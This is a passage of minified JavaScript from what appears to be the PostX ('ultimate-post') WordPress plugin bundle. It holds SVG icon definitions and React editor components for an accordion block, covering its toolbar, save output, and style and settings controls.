24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M7 7.454H3.818"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M22 12c0 5.523-4.477 10-10 10S2 17.523 2 12 6.477 2 12 2s10 4.477 10 10Zm-6.137 9.318 5.228-13.636m-3.864 9.772-4.09-10m-3.41 0 5.455 13.864"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M10.117 17.322 6.09 7.454H3.223m-.303.605 5.217 13.26"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M9.045 7.454h5M8.59 21.318l3.183-8.409M19.5 5.41h-.334a2.273 2.273 0 0 0-2.123 3.083l1.775 4.643"})),youtube_logo_icon_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M10 15V9l5 3-5 3Z"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M19.193 4.352c-3.627-.47-10.402-.47-14.213.004-1.456.18-2.57 1.446-2.757 3.168-.297 2.719-.297 6.233 0 8.952.188 1.722 1.301 2.988 2.757 3.168 3.811.473 10.586.475 14.213.004 1.36-.177 2.375-1.365 2.562-2.972.327-2.811.327-6.541 0-9.352-.187-1.607-1.202-2.795-2.562-2.972Z"})),full_screen_corners_out_line:(0,o.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M3 8.5V5C3 3.89543 3.89543 3 5 3H8.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round"}),(0,o.createElement)("path",{d:"M3 15.5V19C3 20.1046 3.89543 21 5 21H8.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round"}),(0,o.createElement)("path",{d:"M21 8V5C21 3.89543 20.1046 3 19 3H15.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round"}),(0,o.createElement)("path",{d:"M21 15.5V19C21 20.1046 20.1046 21 19 21H15.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round"})),zoom_in_magnifying_glass_plus_line:(0,o.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M11 19C15.4183 19 19 15.4183 19 11C19 6.58172 15.4183 3 11 3C6.58172 3 3 6.58172 3 11C3 15.4183 6.58172 19 11 19Z",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M21.0004 21L16.6504 16.65",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M10.995 8V14M8 11.005L14 11.005",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round"})),zoom_out_magnifying_glass_minus_line:(0,o.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M11 19C15.4183 19 19 15.4183 19 11C19 6.58172 15.4183 3 11 3C6.58172 3 3 6.58172 3 11C3 15.4183 6.58172 19 11 19Z",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M21.0004 21L16.6504 16.65",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M8 11.005L14 11.005",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round"})),plugin_connect_socket_integration_line:(0,o.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M21.5 2.5L18.5 5.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M18 12.9999L20.5858 10.4142C21.3668 9.63311 21.3668 8.36678 20.5858 7.58573L16.4142 3.41416C15.6332 2.63311 14.3668 2.63311 13.5858 3.41416L11 5.99994",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M5.9997 11L3.41391 13.5858C2.63286 14.3668 2.63286 15.6332 3.41391 16.4142L7.58549 20.5858C8.36653 21.3668 9.63286 21.3668 10.4139 20.5858L12.9997 18",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M2.5 21.5L5.5 18.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M4.5 9.5L14.5 19.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M9.5 4.5L19.5 14.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M7 12L9.5 9.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M12 17L14.5 14.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),rocket_fly_boost_launch_pro_line:(0,o.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M20.8991 2.5H21.5V3.10086C21.5 6.28346 19.7357 9.83572 17.4853 12.0862L13.5714 16L8 10.4286L11.9139 6.51473C14.1643 4.26429 17.7165 2.5 20.8991 2.5Z",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M18.5 11L19 17L15 21L13.5 16",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M8 10.5L3 9L7 5L13 5.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M9 15L3.5 20.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M11.5 17.5L9 20",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M6.5 12.5L4 15",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M17.4902 6.5H17.5002",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),gallery_indicator_image_line:(0,o.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M3 5C3 3.89543 3.89543 3 5 3H19C20.1046 3 21 3.89543 21 5V13C21 14.1046 20.1046 15 19 15H5C3.89543 15 3 14.1046 3 13V5Z",stroke:"currentColor",strokeWidth:"1.5"}),(0,o.createElement)("path",{d:"M21.0002 12.6716L19.4144 11.0858C18.6333 10.3047 17.367 10.3047 16.5859 11.0858L15.9144 11.7574C15.1333 12.5384 13.867 12.5384 13.0859 11.7574L10.4144 9.08579C9.63332 8.30474 8.36699 8.30474 7.58594 9.08579L3.33594 13.3358",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round"}),(0,o.createElement)("path",{d:"M16.25 7C16.25 7.82843 15.5784 8.5 14.75 8.5C13.9216 8.5 13.25 7.82843 13.25 7C13.25 6.17157 13.9216 5.5 14.75 5.5C15.5784 5.5 16.25 6.17157 16.25 7Z",stroke:"currentColor",strokeWidth:"1.5"}),(0,o.createElement)("path",{d:"M3 18.5C3 17.9477 3.44772 17.5 4 17.5H6.25C6.80228 17.5 7.25 17.9477 7.25 18.5V20C7.25 20.5523 6.80228 21 6.25 21H4C3.44772 21 3 20.5523 3 20V18.5Z",stroke:"currentColor",strokeWidth:"1.5"}),(0,o.createElement)("path",{d:"M10 18.5C10 17.9477 10.4477 17.5 11 17.5H13.25C13.8023 17.5 14.25 17.9477 14.25 18.5V20C14.25 20.5523 13.8023 21 13.25 21H11C10.4477 21 10 20.5523 10 20V18.5Z",stroke:"currentColor",strokeWidth:"1.5"}),(0,o.createElement)("path",{d:"M17 18.5C17 17.9477 17.4477 17.5 18 17.5H20C20.5523 17.5 21 17.9477 21 18.5V20C21 20.5523 20.5523 21 20 21H18C17.4477 21 17 20.5523 17 20V18.5Z",stroke:"currentColor",strokeWidth:"1.5"})),unlocked_open_security_line:(0,o.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M4 12C4 10.8954 4.89543 10 6 10H18C19.1046 10 20 10.8954 20 12V20C20 21.1046 19.1046 22 18 22H6C4.89543 22 4 21.1046 4 20V12Z",stroke:"currentColor",strokeWidth:"1.5",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M17 10V7C17 4.23858 14.7615 2 12 2C10.1493 2 8.53347 3.0055 7.66895 4.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M12 15.5L12 16.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),unlink_link_break_line:(0,o.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M14.0113 17.0281L11.4972 19.5421C9.55336 21.486 6.40175 21.486 4.45789 19.5421C2.51404 17.5983 2.51404 14.4467 4.45789 12.5028L6.97193 9.98877M9.98875 6.97192L12.5028 4.45789C14.4466 2.51404 17.5983 2.51404 19.5421 4.45789C21.486 6.40174 21.486 9.55334 19.5421 11.4972L17.0281 14.0112",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round"}),(0,o.createElement)("path",{d:"M9.5 14.5L14.5 9.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round"}),(0,o.createElement)("path",{d:"M3 5L19 21",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round"})),plus_circle_zoom_in_line:(0,o.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M12 7V12.0001M12 12.0001V17M12 12.0001H17M12 12.0001H7",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),sort_descending_order_line:(0,o.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M4 18.5H17",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M4 6.5H9.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M4 12.5H11.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M17 14.5V5.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M13 9.5L17 5.5L21 9.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),sort_ascending_order_line:(0,o.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M4 5.5H17",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M4 17.5H9.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M4 11.5H11.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M17 9.5V18.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M13 14.5L17 18.5L21 14.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),right_circle_line:(0,o.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M22 12C22 17.5228 17.5228 22 12 22C6.47715 22 2 17.5228 2 12C2 6.47715 6.47715 2 12 2C17.5228 2 22 6.47715 22 12Z",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M8 12.5L10.5 15L16 9",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),plus:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24",fill:"currentColor"},(0,o.createElement)("path",{d:"M12 19.8c-.4 0-.8-.3-.8-.8v-6.2H5c-.4 0-.8-.3-.8-.8s.3-.8.8-.8h6.2V5c0-.4.3-.8.8-.8s.8.3.8.8v6.2H19c.4 0 .8.3.8.8s-.3.8-.8.8h-6.2V19c0 .4-.4.8-.8.8z"})),subtract:(0,o.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M5 12H19",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}))}},49160:(e,t,l)=>{"use strict";l.d(t,{Z:()=>c});var o=l(67294),a=l(53049),i=l(87763);const{useState:n}=wp.element,{__}=wp.i18n,{Dropdown:r,ToolbarButton:s,ToolbarGroup:p}=wp.components,c=({store:e,handleAddAccordion:t})=>(0,o.createElement)(o.Fragment,null,(0,o.createElement)(p,null,(0,o.createElement)(s,{label:"add new Accordion",onClick:()=>t()},(0,o.createElement)("div",{className:"ultp-toolbar-add-new"},"Add Accordion"))),(0,o.createElement)(p,null,(0,o.createElement)(a.lj,{store:e,attrKey:"barContentAlignment",options:a.M9,label:__("Bar Content Alignment","ultimate-post")})),(0,o.createElement)(r,{contentClassName:"ultp-menu-toolbar-drop",focusOnMount:!0,renderToggle:({onToggle:e})=>(0,o.createElement)(s,{label:"Style",icon:i.Z.styleIcon,onClick:()=>e()}),renderContent:({onClose:t})=>(0,o.createElement)(a.df,{title:!1,include:[{position:5,data:{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"titleColor",label:__("Title Color","ultimate-post")},{type:"color",key:"subtitleColor",label:__("Subtitle Color","ultimate-post")},{type:"color",key:"titleIconColor",label:__("Title Icon Color","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color",key:"titleHoverColor",label:__("Title Color","ultimate-post")},{type:"color",key:"subtitleHoverColor",label:__("Subtitle Color","ultimate-post")},{type:"color",key:"iconHoverColor",label:__("Title Icon Color","ultimate-post")}]},{name:"active",title:__("Active","ultimate-post"),options:[{type:"color",key:"titleActiveColor",label:__("Title Color","ultimate-post")},{type:"color",key:"subtitleActiveColor",label:__("Subtitle Color","ultimate-post")},{type:"color",key:"iconActiveColor",label:__("Title Icon Color","ultimate-post")}]}]}}],initialOpen:!0,store:e})}),(0,o.createElement)(r,{focusOnMount:!0,contentClassName:"ultp-menu-toolbar-drop",renderToggle:({onToggle:e})=>(0,o.createElement)(p,null,(0,o.createElement)(s,{label:"Spacing",icon:i.Z.spacing,onClick:()=>e()})),renderContent:({onClose:t})=>(0,o.createElement)(a.df,{title:!1,include:[{position:1,data:{type:"range",key:"barWrapGap",min:0,max:300,step:1,responsive:!0,label:__("Gap Between Accordion Bars","ultimate-post")}}],initialOpen:!0,store:e})}))},87668:(e,t,l)=>{"use strict";l.d(t,{Z:()=>T});var o=l(67294),a=l(53049),i=l(99838),n=l(87763),r=l(31760),s=l(49160),p=l(5501);const{__}=wp.i18n,{useEffect:c,useState:u,Fragment:d}=wp.element,{InnerBlocks:m,InspectorControls:g,BlockControls:y,useBlockProps:b}=wp.blockEditor,{insertBlocks:v,updateBlockAttributes:h}=wp.data.dispatch("core/block-editor"),{getBlockAttributes:f,getBlockRootClientId:k,getBlockOrder:w,getBlocks:x}=wp.data.select("core/block-editor");function T(e){const[t,l]=u("Content"),{setAttributes:T,name:_,attributes:C,className:E,clientId:S,attributes:{blockId:P,currentPostId:L,advanceId:I,previewImg:B,enableTitleIcon:U,enableSubtitle:M,titleIcon:A,subtitlePosition:H,titleIconPosition:N,triggerIconPosition:j,chooseTriggerIconOpen:Z,chooseTriggerIconClosed:O,triggerIcon:R,autoCollapseEnable:D,initialSelectItem:z}}=e;c((()=>{const e=S.substr(0,6),t=f(k(S));(0,a.qi)(T,t,L,S),P?P&&P!=e&&(t?.hasOwnProperty("ref")||(0,a.k0)()||t?.hasOwnProperty("theme")||T({blockId:e})):T({blockId:e})}),[S]);const F={setAttributes:T,name:_,attributes:C,setSection:l,section:t,clientId:S};let W;if(P&&(W=(0,i.Kh)(C,"ultimate-post/accordion",P,(0,a.k0)())),B)return(0,o.createElement)("img",{style:{marginTop:"0px",width:"420px"},src:B});const[V,G]=u(!1),q=w(S).length,$=()=>{G(!V);const e=x(S);e.length>0&&e.forEach((e=>{h(e.clientId,{activeBlock:!1})}));const t={activeBlock:!0,titleIcon:A,accText:"Add Your Accordion Title",enableSubtitle:M,enableTitleIcon:U,triggerIconPosition:j,chooseTriggerIconOpen:Z,chooseTriggerIconClosed:O},l=wp.blocks.createBlock("ultimate-post/accordion-item",t);v(l,q,S,!0)};c((()=>{const e=x(S);e.length>0&&e.forEach((e=>{h(e.clientId,{titleIcon:A,triggerIcon:R,enableSubtitle:M,initSelectAcc:z,enableTitleIcon:U,autoCollapseEnable:D,triggerIconPosition:j,chooseTriggerIconOpen:Z,chooseTriggerIconClosed:O})}))}),[A,R,M,U,V,z,D,j,Z,O]);let K=[];const J=x(S);c((()=>{J.forEach(((e,t)=>{const l={label:e.attributes.accText,value:t};K=[...K,l]})),K?.length>0&&T({accordionList:K})}),[J]);const Y=b({...I&&{id:I},className:`ultp-block-${P} ${E}`});return(0,o.createElement)(d,null,(0,o.createElement)(g,null,(0,o.createElement)(p.Z,{store:F})),(0,o.createElement)(y,null,(0,o.createElement)(s.Z,{store:F,handleAddAccordion:$})),(0,o.createElement)(r.Z,{include:[{type:"template"}],store:F}),(0,o.createElement)("div",Y,W&&(0,o.createElement)("style",{dangerouslySetInnerHTML:{__html:W}}),(0,o.createElement)("div",{className:`ultp-block-wrapper ultp-accordion-wrapper ultp-accordion__subtitle-${H} ultp-accordion__icon-${N}`},(0,o.createElement)(m,{renderAppender:!1,template:[["ultimate-post/accordion-item",{activeBlock:!0,titleIcon:A,enableSubtitle:M,enableTitleIcon:U,triggerIconPosition:j,chooseTriggerIconOpen:Z,chooseTriggerIconClosed:O}]],allowedBlocks:["ultimate-post/accordion-item"]}),(0,o.createElement)("div",{className:"ultp-accordion-new"},(0,o.createElement)("span",{className:"ultp-accordion-new__wrapper",onClick:()=>$()},n.Z.plus," Add New Accordion")))))}},70124:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r});var o=l(87462),a=l(67294);const{InnerBlocks:i,useBlockProps:n}=wp.blockEditor;function r(e){const{blockId:t,advanceId:l,titleIconPosition:r,subtitlePosition:s,initialSelectItem:p,autoCollapseEnable:c,className:u}=e.attributes,d=n.save({...l&&{id:l},className:`ultp-block-${t} ${u}`});return(0,a.createElement)("div",(0,o.Z)({},d,{"data-bid":t,"data-active":p,"data-autocollapse":c}),(0,a.createElement)("div",{className:`ultp-accordion-wrapper ultp-accordion__subtitle-${s} ultp-accordion__icon-${r}`},(0,a.createElement)(i.Content,null)))}},5501:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r});var o=l(67294),a=l(53049),i=l(92637),n=l(43581);const{__}=wp.i18n,r=({store:e})=>{const{accordionList:t,triggerIcon:l}=e?.attributes;let r=t&&t.sort(((e,t)=>e.value-t.value)).map((e=>({value:`${e.value}`,label:__(`#${e.value} ${e.label} `,"ultimate-post")})));return r=[...r,{value:"None",label:__("None","ultimate-post")}],(0,o.createElement)(o.Fragment,null,(0,o.createElement)(n.default,{prev:"https://www.wpxpo.com/postx/blocks/#demoid8851",store:e}),(0,o.createElement)(i.Sections,null,(0,o.createElement)(i.Section,{slug:"accordion-settings",title:__("Setting","ultimate-post")},(0,o.createElement)(a.T,{title:"inline",initialOpen:!0,include:[{position:1,data:{type:"toggle",key:"autoCollapseEnable",label:__("Enable auto-collapse","ultimate-post")}},{position:2,data:{type:"select",key:"initialSelectItem",options:r?.length>0?r:[],label:__("Initially Opened Accordion","ultimate-post")}},{position:3,data:{type:"toggle",key:"enableSubtitle",label:__("Enable Subtitle","ultimate-post")}},{position:4,data:{type:"tag",key:"subtitlePosition",label:__("Subtitle Position","ultimate-post"),options:[{value:"left",label:__("Left","ultimate-post")},{value:"right",label:__("Right","ultimate-post")},{value:"top",label:__("Top","ultimate-post")},{value:"bottom",label:__("Bottom","ultimate-post")}]}},{position:5,data:{type:"toggle",key:"enableTitleIcon",label:__("Title Icon","ultimate-post")}},{position:6,data:{type:"icon",key:"titleIcon",help:"Remove individual icons to apply the same icons to all sections",label:__("Choose Icon","ultimate-post")}},{position:7,data:{type:"tag",key:"titleIconPosition",label:__("Icon Position","ultimate-post"),options:[{value:"left",label:__("Left","ultimate-post")},{value:"right",label:__("Right","ultimate-post")}]}},{position:8,data:{type:"toggle",key:"triggerIcon",label:__("Accordion Trigger Icon","ultimate-post")}},{position:9,data:{type:"icon",key:"chooseTriggerIconOpen",label:__("Accordion Open","ultimate-post")}},{position:9,data:{type:"icon",key:"chooseTriggerIconClosed",label:__("Accordion Closed","ultimate-post")}},{position:10,data:{type:"tag",key:"triggerIconPosition",label:__("Icon Position","ultimate-post"),options:[{value:"left",label:__("Left","ultimate-post")},{value:"right",label:__("Right","ultimate-post")}]}}],initialOpen:!0,store:e})),(0,o.createElement)(i.Section,{slug:"style",title:__("Style","ultimate-post")},(0,o.createElement)(a.T,{title:__("Bar Element Style","ultimate-post"),include:[{position:1,data:{type:"alignment",key:"barContentAlignment",disableJustify:!0,label:__("Alignment","ultimate-post")}},{position:2,data:{type:"typography",key:"titleTypo",label:__("Title Typography","ultimate-post")}},{position:3,data:{type:"typography",key:"subtextTypo",label:__("Subtitle Typography","ultimate-post")}},{position:4,data:{type:"range",key:"titleIconSize",min:0,max:300,step:1,responsive:!0,label:__("Title Icon Size","ultimate-post")}},{position:5,data:{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"titleColor",label:__("Title Color","ultimate-post")},{type:"color",key:"subtitleColor",label:__("Subtitle Color","ultimate-post")},{type:"color",key:"titleIconColor",label:__("Title Icon Color","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color",key:"titleHoverColor",label:__("Title Color","ultimate-post")},{type:"color",key:"subtitleHoverColor",label:__("Subtitle Color","ultimate-post")},{type:"color",key:"iconHoverColor",label:__("Title Icon Color","ultimate-post")}]},{name:"active",title:__("Active","ultimate-post"),options:[{type:"color",key:"titleActiveColor",label:__("Title Color","ultimate-post")},{type:"color",key:"subtitleActiveColor",label:__("Subtitle Color","ultimate-post")},{type:"color",key:"iconActiveColor",label:__("Title Icon Color","ultimate-post")}]}]}},{position:6,data:{type:"range",key:"titleSubtextGap",min:0,max:300,step:1,responsive:!0,label:__("Gap Between Title & Subtitle","ultimate-post")}},{position:7,data:{type:"range",key:"titleIconGap",min:0,max:300,step:1,responsive:!0,label:__("Gap Between Title & Title Icon","ultimate-post")}}],initialOpen:!0,store:e}),l&&(0,o.createElement)(a.T,{title:__("Accordion Trigger Icon","ultimate-post"),include:[{position:1,data:{type:"range",key:"triIconSize",min:0,max:300,step:1,responsive:!0,label:__("Icon Size","ultimate-post")}},{position:2,data:{type:"range",key:"titleTriggerIconGap",min:0,max:300,step:1,responsive:!0,label:__("Title & Trigger Icon Gap","ultimate-post")}},{position:3,data:{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"triIconColor",label:__("Icon Color","ultimate-post")},{type:"color2",key:"triIconBg",label:__("Icon Background Color","ultimate-post")},{type:"border",key:"triIconBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"triIconRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color",key:"triIconHoverColor",label:__("Icon Color","ultimate-post")},{type:"color2",key:"triIconHoverBg",label:__("Icon Background Color","ultimate-post")},{type:"border",key:"triIconHoverBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"triIconHoverRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")}]},{name:"active",title:__("Active","ultimate-post"),options:[{type:"color",key:"triIconActiveColor",label:__("Icon Color","ultimate-post")},{type:"color2",key:"triIconActiveBg",label:__("Icon Background Color","ultimate-post")},{type:"border",key:"triIconActiveBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"triIconActiveRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")}]}]}},{position:4,data:{type:"dimension",key:"triIconPadding",step:1,unit:!0,responsive:!0,label:__("Padding","ultimate-post")}}],store:e}),(0,o.createElement)(a.T,{title:__("Accordion Bar Wrapper","ultimate-post"),include:[{position:1,data:{type:"range",key:"barWrapGap",min:0,max:300,step:1,responsive:!0,label:__("Gap Between Accordion Bars","ultimate-post")}},{position:2,data:{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color2",key:"barWrapBg",label:__("Background","ultimate-post")},{type:"border",key:"barWrapBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"barWrapRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")},{type:"boxshadow",key:"barWrapShadow",step:1,unit:!0,responsive:!0,label:__("Box shadow","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color2",key:"barWrapHoverBg",label:__("Background","ultimate-post")},{type:"border",key:"barWrapHoverBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"barWrapHoverRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")},{type:"boxshadow",key:"barWrapHoverShadow",step:1,unit:!0,responsive:!0,label:__("Box shadow","ultimate-post")}]},{name:"active",title:__("Active","ultimate-post"),options:[{type:"color2",key:"barWrapActiveBg",label:__("Background","ultimate-post")},{type:"border",key:"barWrapActiveBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"barWrapActiveRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")},{type:"boxshadow",key:"barWrapActiveShadow",step:1,unit:!0,responsive:!0,label:__("Box shadow","ultimate-post")}]}]}},{position:4,data:{type:"dimension",key:"barWrapperPadding",step:1,unit:!0,responsive:!0,label:__("Padding","ultimate-post")}}],store:e}),(0,o.createElement)(a.T,{title:__("Content Area","ultimate-post"),include:[{position:1,data:{type:"range",key:"contentBarGap",min:0,max:300,step:1,responsive:!0,label:__("Gap From Accordion Bar","ultimate-post")}},{position:2,data:{type:"border",key:"contentBorder",label:__("Border","ultimate-post")}},{position:3,data:{type:"dimension",key:"contentRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")}},{position:4,data:{type:"dimension",key:"contentPadding",step:1,unit:!0,responsive:!0,label:__("Padding","ultimate-post")}},{position:5,data:{type:"color2",key:"contentBg",label:__("Background","ultimate-post")}}],store:e})),(0,o.createElement)(i.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.Mg,{store:e}),(0,o.createElement)(a.iv,{store:e}))))}},57288:(e,t,l)=>{"use strict";l.d(t,{Z:()=>p});var o=l(67294),a=l(41557),i=l(87763);const{Dropdown:n,ToolbarGroup:r,ToolbarButton:s}=wp.components,p=({store:e})=>{const{itemSingleIcon:t}=e.attributes;return(0,o.createElement)(o.Fragment,null,(0,o.createElement)(r,null,(0,o.createElement)(s,{label:"Duplicate",icon:i.Z.duplicate,onClick:()=>{wp.data.dispatch("core/block-editor").duplicateBlocks([e?.clientId],!0)}})),(0,o.createElement)(n,{popoverProps:{placement:"bottom-start"},className:"ultp-social-dropdown",renderToggle:({onToggle:e})=>(0,o.createElement)(r,{className:"ultp-toolbar-title-icon"},(0,o.createElement)(s,{size:"small",className:"ultp-toolbar-add-new",label:"Icon",onClick:()=>e()},"Title Icon")),renderContent:()=>(0,o.createElement)(a.Z,{inline:!0,value:t,isSocial:!0,label:"Update Single Icon",dynamicClass:" ",onChange:t=>e.setAttributes({itemSingleIcon:t})})}))}},14370:(e,t,l)=>{"use strict";l.d(t,{Z:()=>L});var 